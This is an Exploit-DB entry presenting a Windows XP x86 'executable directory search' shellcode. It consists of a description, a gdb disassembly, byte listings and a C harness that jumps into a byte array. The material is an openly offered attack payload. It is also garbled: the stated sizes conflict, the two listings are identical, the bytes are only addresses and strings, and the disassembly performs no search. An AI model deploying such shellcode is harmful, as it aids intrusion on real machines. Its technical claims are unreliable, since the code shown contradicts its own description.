Windows x86 - Executable Directory Search Shellcode (130 bytes)

ID EDB-ID:41467
Type exploitdb
Reporter Exploit-DB
Modified 2017-02-26T00:00:00


Windows x86 - Executable Directory Search Shellcode (130 bytes). Shellcode exploit for Win_x86 platform

# Title: Windows x86 - Executable directory search Shellcode (130 bytes)
# Date: 26-02-2017
# Author: Krzysztof Przybylski
# Platform: Win_x86
# Tested on: WinXP SP1
# Shellcode Size: 130 bytes

Write-and-exec directory searcher.
The search starts from C:\.
If a directory that is both writable and executable is found, the payload is written there, executed (ping) and the shellcode exits.
If a directory that is writable but not executable is found, the search continues.

Tested on WinXP SP1 (hardcoded API addresses: 77e6fd35 for exec, 77e798fd for exit; see the comments in the byte listings)
i686-w64-mingw32-gcc shell.c -o golddgger.exe

Null-free version:

(gdb) disassemble 
Dump of assembler code for function function:
=> 0x08048062 <+0>:	pop    ecx
   0x08048063 <+1>:	xor    eax,eax
   0x08048065 <+3>:	mov    BYTE PTR [ecx+0x64],al
   0x08048068 <+6>:	push   eax
   0x08048069 <+7>:	push   ecx
   0x0804806a <+8>:	mov    eax,0x77e6fd35
   0x0804806f <+13>:	call   eax
   0x08048071 <+15>:	xor    eax,eax
   0x08048073 <+17>:	push   eax
   0x08048074 <+18>:	mov    eax,0x77e798fd
   0x08048079 <+23>:	call   eax

NULL-free shellcode (132 bytes):

"\x35\xfd\xe6\x77"                      // exec
"\xfd\x98\xe7\x77"                      // exit
"\x63\x3a\x5c"                          // C:\ (search root)
"\x31\x37\x32\x2e\x31\x2e\x31\x2e\x31"  // 172.1.1.1

// NULL version (130 bytes):
// only the leading bytes of the 130-byte payload appear in this listing

char code[] =
"\x35\xfd\xe6\x77"                      // exec  (hardcoded WinXP SP1 address)
"\xfd\x98\xe7\x77"                      // exit  (hardcoded WinXP SP1 address)
"\x63\x3a\x5c"                          // C:\ (search root; no trailing backslash, which would splice the next line into the comment)
"\x31\x37\x32\x2e\x31\x2e\x31\x2e\x31"; // 172.1.1.1

int main(int argc, char **argv)
{
        int (*func)();
        func = (int (*)()) code;        // treat the byte array as a function and jump into it
        func();
        return 0;
}